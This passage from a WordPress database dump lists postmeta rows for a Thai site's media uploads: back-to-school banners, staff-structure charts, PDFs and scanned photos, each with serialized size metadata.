(1796,573,'_wp_attached_file','2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1.png'),
(1797,573,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:250;s:4:\"file\";s:216:\"2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1.png\";s:8:\"filesize\";i:211042;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:215:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39463;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:216:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27086;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:216:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:204897;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:216:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76693;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1798,574,'title_style','default'),
(1799,574,'_title_style','field_5d1a0217cf408'),
(1801,362,'_generateblocks_dynamic_css_version','1.9.1'),
(1802,576,'title_style','default'),
(1803,576,'_title_style','field_5d1a0217cf408'),
(1805,578,'title_style','default'),
(1806,578,'_title_style','field_5d1a0217cf408'),
(1808,580,'title_style','default'),
(1809,580,'_title_style','field_5d1a0217cf408'),
(1811,582,'title_style','default'),
(1812,582,'_title_style','field_5d1a0217cf408'),
(1814,584,'title_style','default'),
(1815,584,'_title_style','field_5d1a0217cf408'),
(1816,585,'_wp_attached_file','2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2.png'),
(1817,585,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:250;s:4:\"file\";s:216:\"2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2.png\";s:8:\"filesize\";i:208338;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:215:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38768;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:216:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27022;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:216:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:201060;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:216:\"สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76606;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1818,586,'title_style','default'),
(1819,586,'_title_style','field_5d1a0217cf408'),
(1820,587,'_wp_attached_file','2024/08/โครงสร้างบุคลากร.png'),
(1821,587,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:60:\"2024/08/โครงสร้างบุคลากร.png\";s:8:\"filesize\";i:379021;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"โครงสร้างบุคลากร-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:60997;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"โครงสร้างบุคลากร-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26334;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"โครงสร้างบุคลากร-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:283740;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"โครงสร้างบุคลากร-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65808;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1823,589,'_wp_attached_file','2024/08/โครงสร้างบุคลากร-1.png'),
(1824,589,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:62:\"2024/08/โครงสร้างบุคลากร-1.png\";s:8:\"filesize\";i:379021;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"โครงสร้างบุคลากร-1-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:60997;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"โครงสร้างบุคลากร-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26334;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"โครงสร้างบุคลากร-1-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:283740;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"โครงสร้างบุคลากร-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65808;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1825,590,'_wp_attached_file','2024/08/โครงสร้างการบริหาร1.pdf'),
(1826,590,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:109622;}'),
(1827,591,'_wp_attached_file','2024/08/โครงสร้างการบริหารงานของหน่วยงาน.pdf'),
(1828,591,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:109622;}'),
(1829,592,'title_style','default'),
(1830,592,'_title_style','field_5d1a0217cf408'),
(1831,593,'_edit_last','1'),
(1832,593,'_edit_lock','1751427560:1'),
(1833,594,'_wp_attached_file','2024/08/S__16285720.jpg'),
(1834,594,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285720.jpg\";s:8:\"filesize\";i:1178509;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285720-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25204;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285720-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:189687;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9689;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285720-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:189730;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285720-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:365085;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285720-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:576167;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285720-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22080;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1835,595,'_wp_attached_file','2024/08/S__16285721.jpg'),
(1836,595,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285721.jpg\";s:8:\"filesize\";i:1253643;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285721-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26287;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285721-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:211731;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285721-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9667;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285721-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:211615;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285721-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:401742;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285721-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:624735;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285721-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24240;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1837,596,'_wp_attached_file','2024/08/S__16285724.jpg'),
(1838,596,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285724.jpg\";s:8:\"filesize\";i:1208331;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285724-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26173;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285724-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:201074;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285724-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9962;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285724-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:201168;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285724-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:382042;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285724-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:596377;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285724-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26729;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1839,597,'_wp_attached_file','2024/08/S__16285726.jpg'),
(1840,597,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285726.jpg\";s:8:\"filesize\";i:1232128;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285726-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25808;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285726-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203255;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285726-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9910;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285726-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203144;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285726-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:389137;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285726-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:609225;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285726-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23810;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1841,598,'_wp_attached_file','2024/08/S__16285728.jpg'),
(1842,598,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285728.jpg\";s:8:\"filesize\";i:1211208;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285728-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24674;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285728-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194601;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285728-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9178;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285728-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194652;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285728-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:376297;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285728-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:595095;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285728-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21302;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1843,599,'_wp_attached_file','2024/08/S__16285729.jpg'),
(1844,599,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285729.jpg\";s:8:\"filesize\";i:1337102;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285729-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25418;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285729-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:200507;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285729-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9466;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285729-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:200589;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285729-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:389964;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285729-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:620497;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285729-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21166;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1845,600,'_wp_attached_file','2024/08/S__16285733.jpg'),
(1846,600,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285733.jpg\";s:8:\"filesize\";i:856820;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285733-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20594;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285733-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131081;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285733-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8357;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285733-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131189;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285733-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:248264;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285733-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:393956;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285733-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17711;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1847,601,'_wp_attached_file','2024/08/S__16285735.jpg'),
(1848,601,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1774;s:6:\"height\";i:2364;s:4:\"file\";s:23:\"2024/08/S__16285735.jpg\";s:8:\"filesize\";i:817204;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__16285735-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21912;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__16285735-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136228;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285735-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8842;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__16285735-768x1023.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136370;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__16285735-1153x1536.jpg\";s:5:\"width\";i:1153;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:252392;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__16285735-1537x2048.jpg\";s:5:\"width\";i:1537;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:394052;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__16285735-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17322;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(1849,602,'_wp_attached_file','2024/08/S__16285737.jpg'),
